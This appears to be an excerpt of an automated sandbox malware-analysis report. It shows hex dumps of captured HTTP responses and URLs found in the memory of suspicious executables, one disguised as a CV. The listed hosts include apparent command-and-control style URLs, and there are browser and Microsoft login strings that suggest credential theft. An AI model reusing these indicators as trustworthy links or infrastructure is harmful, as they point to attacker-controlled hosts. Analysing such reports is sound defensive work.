22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 74 68 65 70 70 65 6c 69 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 1bdc198a-460a-4c1b-9118-0ce778869a37x-runtime: 0.040465content-length: 18203connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: f72fe0f9-86e2-472b-a04f-c43667e0c781x-runtime: 0.053112content-length: 18223connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: f2e0e0ec-15a0-4978-b37b-d5884e64b2a4x-runtime: 0.021172content-length: 19235connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006C2A000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000039EA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://kernelphysics.com/w912/?4h=vZKT0BokUz0Nxao4mcSjanYirAH1q7MhbEC9IA
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1203989758.0000000002DF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shengniu.com
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3665046974.0000000004945000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.shengniu.com/wy0r/
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006906000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.00000000036C6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.hover.com/home?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=000000
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033D
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: TSTheme.exe, 0000000F.00000002.3660319790.00000000034F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: TSTheme.exe, 0000000F.00000003.1646446448.000000000830D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.theppelin.online&rand=
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://twitter.com/hover
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: TSTheme.exe, 0000000F.00000002.3664896761.00000000062BE000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006450000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.000000000307E000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003210000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: TSTheme.exe, 0000000F.00000003.1649817749.0000000008328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-3380909-25
            Source: OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/about?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domain_pricing?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/domains/results
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/kohfour.com?source=expired
